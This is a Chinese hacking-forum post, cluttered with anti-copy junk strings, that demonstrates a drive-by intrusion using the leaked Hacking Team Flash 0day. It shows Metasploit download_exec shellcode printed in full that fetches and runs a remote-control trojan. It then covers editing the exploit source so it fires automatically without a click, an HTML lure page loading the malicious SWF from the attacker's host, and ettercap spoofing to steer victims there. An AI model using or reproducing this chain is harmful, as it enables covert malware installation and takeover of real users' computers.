找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1395|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

; a% o5 z& a% q 三、flash 0day之手工代码修改制作下载者实例入侵演示 3 K( \( G( N! E( C; ?: T: y; x

" D; \* q4 D ?! r0 h+ u7 t# y {

5 Z$ |) K! {. M L9 ^ 利用到的工具: 6 j& H0 d( d/ w4 g: T. x

2 [1 k- m! L( Y0 W

# g+ M5 ~6 K, T) D) o Msf - h2 e5 A7 x9 G k4 @4 O

" w9 C7 m) s) l& ~1 F5 u$ [+ B

* d% Q7 A0 x0 X m Ettercap + c' ~: w' i8 n0 |7 r1 m. O

0 G, X6 p) N6 X ?

- S0 g/ A$ n: C Adobe Flash CS6 " H7 T8 L; u, x1 A# Y

9 e5 ~7 ~1 T7 n6 w! p

u6 W9 L: l- E9 n1 p Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 3 M. J2 U. a/ i- Y' O0 o

5 d4 v1 o- H2 {; W

8 w2 g! y: k1 {- @1 z 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options ) e- Q2 i! f) Z9 G1 W2 Z0 s

- g p, G: f6 r T/ T

1 @2 A1 E8 f) C: c" l$ i 如图: ; S- I; P/ t1 V% P& e

+ p+ N% N' |3 _, a$ z" I

$ J+ w) |! |" R# |# v" l: J. [6 @   3 g) J/ Z: P ?# `" a7 _

4 z5 G1 w# n, Q( k

/ T; I5 P! P: [0 ]. d: `% x   3 P$ t8 K8 G% {2 s& l0 M

: k; J+ \6 s! v$ W$ Q' R( ?/ h

& E8 H( ?0 H4 S) i+ F& c8 d( R _ 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 6 @3 l% }7 D( r) b& ^7 ?

7 c+ h3 `7 H1 K& w

5 g! {/ I3 Z$ i' y   ; Z/ @) S0 e$ Z; x* G8 W3 m

A% y% y" ?; Z3 V7 d

$ k" O) j5 y6 U n: f4 v0 v   & p: r! ?6 ~& ^1 k7 O

8 H% {2 \/ y; R0 e' e

4 X3 B* j% d: p- @) D 然后执行generate -t dword生成shellcode,如下: $ o5 w4 S. W4 S8 y# l4 H

+ S/ F* M& }& a( \" P5 g

8 T( O6 V. a# r. F- O) x4 F   9 p% n; ` M8 C6 ^+ `

7 K/ f6 [9 p% q+ M. n a

! }; q5 `1 |1 k6 i2 s" ^ 复制代码到文本下便于我们一会编辑flash exp,如下: 2 N) M% Y4 M' g

% m- z+ S0 i) r/ U$ E

, O8 o& V9 C$ C4 d( t8 G# w4 ? 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 3 L8 m! K6 n L$ O$ e8 L

& _) W3 _* E) r

) t4 A+ q% A9 _% {, q 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, / \+ @ z2 r% T- e

; D& w4 z5 s( S* i* @+ l

. K6 O6 ?; J. G* F& G6 H* G3 N 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, & Z+ Q, C' o/ E% D" V8 i

2 _4 _. E/ h7 `$ f4 c

( b9 U( I5 m/ W3 x% d5 y8 ^, W 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 0 F" D& X) ]1 Z/ n/ }* m3 G

0 g8 |3 q+ d( h0 R# t9 `# \

3 {9 @) }7 d j( w! d: g1 V 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 1 k8 C9 a- p* I& g) ?" I

, K9 G5 I! o. h/ G' w, Q

* Y* W- e( P# }" Q3 O4 I; i. c 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 3 ?9 v1 h1 _5 w0 D. L0 j/ B8 O' w

4 e2 t9 D5 Z* F

* d* Z( [* \% ]' ~0 o; Q0 F2 Z$ x4 ` 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, R2 N0 T4 j$ Y* @5 L

( a3 ~* d4 \# x

6 r1 L, A$ u) E! ]4 N6 D1 Q2 Q5 M. ^ 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, ( C% i1 ~, {& u6 e. O4 ?

* Y8 o) I) K: |

2 g# q- ~- [: }1 F" \3 ` 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, / o: y$ H2 ]* h( w

8 x6 u' Z# z, D, V

& _4 ]- g( i ` 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, / q5 }- Z& M; q0 O9 I8 w4 H

1 \' D+ W1 @/ z3 Z* N1 R

* `% ^1 M, Q/ w. ]2 U/ D 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, + s. ^' g& q) F# i# e0 t! N6 x( c8 ?

8 {0 L$ P, \6 G6 Q4 j

F* _3 m$ |( J2 y$ _ 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 0 S2 V" E0 W, }2 V

q5 A$ t& r5 Y: r. s

3 g( p) Y, ]' _ 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, - X3 ~% i# D4 b

3 I# y% e# j2 o6 D

6 ]3 _- ]/ l+ K* U( Q% [ 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 # H/ j2 v1 w- g! d- W

9 T! O$ G- W' e0 _/ r4 x

6 w+ T1 p" Y% H6 ~   5 c I/ a% I# m6 E8 i$ I/ h& x

! }/ D8 f0 a/ J- X

5 H3 N: b. `" m2 ~9 P   0 m. D/ \+ j& j5 c1 [2 M

: D$ R0 r$ I; z

; H8 G; f4 ~. t- T% ?9 ]) I 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 1 R) _3 q+ g% L: q0 X: E1 H

2 M3 x2 t7 m& _8 ?6 q8 x

1 {9 F4 [" t: b0 F1 T9 b   $ J5 H+ s' e0 Q/ C* I$ X

* f1 a7 B" w9 J% p# [' j

) k T' w$ N l9 c3 {; T: q" x$ b 先修改ShellWin32.as,部分源代码如图: 8 y. e2 O& P) |$ d

+ w3 X9 }1 @8 I; r, P8 i* I+ z

8 |8 R+ e- S3 A5 `   O* C) A1 o" v0 {( Z7 E

4 `, O% d+ I3 Q, s+ a' M( \& @

+ y2 p+ P* x- I" A- j 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 5 Y: d$ d) a8 t5 {2 T

4 ~" w- v6 G, e, m4 ]- {

0 e0 [ _+ h: J' |' j1 V   # J! {4 X. t, V

& M' d) X$ h& S$ j

5 b8 k; E& [" i P/ W% m 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: 6 L! m @/ j, E* c! `- M3 c* r+ B

# S3 W6 B8 H0 i

/ @2 ]: R" @( x   i# F# i7 N7 O; `& ~) Z

( Q' j9 A9 Q" H+ K0 Z( l% h% A

# l! v( F5 v/ n; ?: n 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: ' s& R0 |0 @& L+ b' H$ Q e

5 B% D8 k+ X" ~0 \

. [$ C- r# q' f0 D; m+ a- P, {   " C& l# g+ l6 h/ \ @

$ A0 J2 r+ @* E# M' p& R7 Q

6 G2 ]8 q8 ^3 o3 Z3 P4 T6 Q8 }   ( C' R0 i" ?9 f. `& W# G

o7 @! [( y- j. ]" f5 s9 H

) F; p$ Q! u7 l$ s- x. P* R+ C+ {   4 D1 y& D* B& g

7 d- T, e4 f ?

) }6 ?+ L$ O- G- q) J$ ^) o 然后点保存,下面我们来编译一下,打开 ! v% H1 B+ w6 a! }; w

' v9 `; t( X3 F+ R

! N+ p0 }' S% m* x2 Q exp1.fla然后点文件-发布,看看编译没错误 7 ?5 I* J4 ~9 g; Y/ p. r

6 o! `4 @8 z+ } f. `) \0 v& _; H

' f2 P+ x5 r# n* U2 O3 x& a   : v& g6 _1 l1 g0 }" H& \% {. s

& d* J j4 w5 @* R" w- S2 x

7 P& F2 Q( o4 ]' u% ~# r# ^   $ i" A8 N0 x. Q, O6 M$ i

8 R: L5 }2 g: P1 T D* |8 t

) `# R$ G' s# C& H   6 Q' n$ Y, E, H

( s+ G5 E7 s/ `& X: r) ^: s

9 }( G: G* c/ P U   + o& Q( {; ?6 _9 r! i( M

5 S$ P: {; D+ q$ D2 q/ {) \- |: I

8 q4 a- C) C. L9 d 然后我们把生成的 - V; ]# i1 S. O B1 ^0 j

- O+ X6 e7 O; }9 W

# p. C3 A1 N4 h exp1.swf丢到kailinux /var/www/html下: ' f1 [7 Q1 P) t4 ?# Q' s2 p

0 q6 O3 Q& J: k$ ?3 D% K( K+ L

L* Q" `# L, }1 ]0 ? 然后把这段代码好好编辑一下 0 `- N" z W. c* f7 E

+ k; X8 e/ |5 S1 P9 U$ H( j/ n

3 \1 o7 J A% [% }3 Q& E   ' P& r. y! z. U3 K4 h1 G

. T2 s" P/ f# s5 Y% b F

3 x: j: r! r( n1 V' v8 r8 s* j   9 B) g% J; p& s, f+ C8 O+ q. j

, Z" n& x, M1 w$ c, s3 E& e: o

0 W6 l! \0 }: ?+ c1 P2 |' V& _- x2 }   0 q" n m" ]& T

$ x7 O: c+ |2 ~* I. \7 u

+ E5 p( r9 {" h0 W' U/ \2 I   & C3 a; Y ~9 s

6 T/ W, e& W" \% Z

( E& S/ {; m/ m9 t6 {- W2 K   : P, f. b& H: x4 I% `6 \* R$ j

! P& X! @5 }5 D: |# q

$ G; @7 E( u' M- [! d   - z( r- G0 B! ~7 @& u

; P- G* c/ Z5 G. f9 ^8 l

( U! T _1 F- }1 V <!DOCTYPE html> + K1 V- ]$ e% Z t+ O+ W

% @7 B/ E/ g. A, g- D. V

: n2 P! o9 q2 s& j) N <html> / Q9 b) y# N# R

9 D$ s1 q' m0 x- \

! A5 Z+ I. \! \3 Q7 N) | <head> e0 o" |% g' [0 D' H0 L/ l, R: i

" v$ G3 r; t# ]! g' \

% X' q- W- ^ z <meta http-equiv="Content-Type" content="text/html; : w9 N2 T, Z _+ d& s/ I% T- @

Z) v; i1 }: P7 d1 Q

0 K7 a0 U7 y/ Q3 f; P! ] charset=utf-8"/> * A% f8 e$ M8 {3 u

& P' A! y+ ?/ U3 J+ H" S- U

6 F$ ^8 f" F, r4 v </head> 7 Z* L" i2 a4 ^9 f8 {

5 {6 P0 r% m! a) V/ r' P

: ^7 v4 W5 r& H <body> ( Q1 v- d, J' B: D. c2 v

9 X( L! l$ Y: P2 D9 ]! a# M/ _

+ @6 l+ T( w- ~5 d <h2> Please wait, the requested page is loading...</h2> ! w2 E1 e. W# b' w5 I

4 u& e0 ^, V4 L; e3 f$ D6 b1 {

5 k+ H% f6 K H) O1 @5 X <br> $ D) Z6 E% f2 T, ]' K% L

6 D5 B. }3 D9 e5 i4 Y- S1 @

( n0 Z, g2 g/ T5 M3 D" O <OBJECT 7 o2 L! E' a, T, \8 u

+ ~9 ?; x+ s7 q5 |

# e2 z+ x! A1 k) A4 L classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie 5 C' R( h* Z% |7 n/ c1 E. g& w

8 r* ]) _5 S, \1 H

" Z% ^% x" U& W4 R VALUE="http://192.168.0.109/exp1.swf"></OBJECT> " a! }* f J4 P0 P: w' w" z7 N5 v

* [" r6 D0 S7 e3 k/ [" I2 O+ ?

8 O! ~2 Q! ]0 |3 d7 q6 X </body> ; z+ @* E( x8 J* N6 Q

) q( k8 F: W3 j4 p. D' l8 e/ g

$ `% l. _5 P/ Q+ ?0 T' U: Y <script> ! T+ k3 {5 d% P0 Y4 o

$ Z% I$ ^' R/ T7 y# ~ [

: I1 O7 ?) s3 S# o. u     setTimeout(function () { : Z; r( s0 f: g* l4 ~

7 K2 l5 Y' `) A. l* m% |

9 Q8 |; ^" M' l* \) J- D* e          2 n2 v+ @- h; m# {+ _- d8 y

2 {" h! d% Z( U) @" F; [

5 X+ b7 a$ n1 f w% h window.location.reload(); 8 ` Z) Y) Z% W# [0 r0 R& e( F

& J3 r# J, h5 ?; n% m/ V

; o$ t7 F" b& M& Y3 K+ F     }, 10000); 8 a" z. c% l/ L0 S3 x$ @

+ Y3 m& R6 v3 t* S" t9 T2 h" t

9 W# U) M3 \- R6 T' y+ B   ( u# f7 N* p: b; V3 N: Y; u* c

3 w% E0 [' {! O5 l

8 t& G( d% Q. Y6 R </script> 0 z) P/ b/ g5 S/ z0 W- T

' ]0 t6 E: Z5 y. @" `5 J% p) i5 f( _

% ]; f/ M8 K& N, R2 ^ </html> x4 q& Y) z1 s' V4 c

( o$ ^& d& X( i1 G* R# \

2 t0 ?: P- @1 y   5 n+ W+ _" B6 [; ~4 P

2 h8 p: W: A- m* [! ?

$ z6 R- `6 {5 X# |" M 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: : s$ x2 X! T' d8 v; @. J

3 X0 \8 Z4 J4 L" c/ o O, m' y' m

3 B$ d8 {- r2 Z8 g' l4 A1 |' ?$ c   4 e( X \3 Y2 d) E1 D) P W& Z: {

% K; S/ _0 a2 E+ C( w

- \9 A0 \# g4 z   |3 Z/ u8 m3 c% ^2 k) m$ u/ b3 _

2 I( T% b! s/ R+ S0 g! `

3 M" ?' r; `7 h7 P/ Z1 h5 M   * E( N. R& d6 T. U. [/ o

* x, y/ R1 M/ R! o% `9 J. }$ I

2 `( F) E3 x0 ?& Q3 }   : q# M9 H- g' S* r6 w

. p/ F7 U' X, l' W

* Q0 r; z T( f6 V, y( f$ r7 ~   5 A$ j: R: v) O+ f

$ j7 y# @1 W8 t' l" k

( }7 @5 O! Z* [; C6 \) ]& | 下面我们用ettercap欺骗如图: ) C1 x w J5 P* z: v

' d0 s6 g g4 C5 V5 q

+ y5 V6 K! K8 d+ M3 @1 {; y2 I$ U: k   ! O- y6 C! b& G: I

" ~. M S) y$ Z7 w0 n

# j& k+ _. S: I( H   - P7 R6 F" Y$ `# L7 O

" [: d, j0 `1 k% y' S2 U, \8 s

$ e* w+ B4 I7 @9 Q2 I. ? 下面我们随便访问个网站看看: . t/ o' R% g$ Z" @9 h3 M

' L: u' B4 j, z, A

/ h" i/ ]! g6 {% m& L 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: ! g5 w% J7 ?3 ]: y$ R

* _) ^0 A" `; }$ G4 W& _2 [

- }' B9 X D, ]( s( r   1 L( z Q* n9 }$ s+ ?! [

5 l( i# g# }) V! ^; }- [

- ~9 a4 Z7 M5 ` 我们看另一台, ' l3 D! z! G3 h- a& Z1 S0 ]- |

" k: p: P* j1 B% C( P; Q% K$ f

. F9 }+ o0 n: P( D# H% o. q. N 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 $ ^1 P4 X" `+ D4 v

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表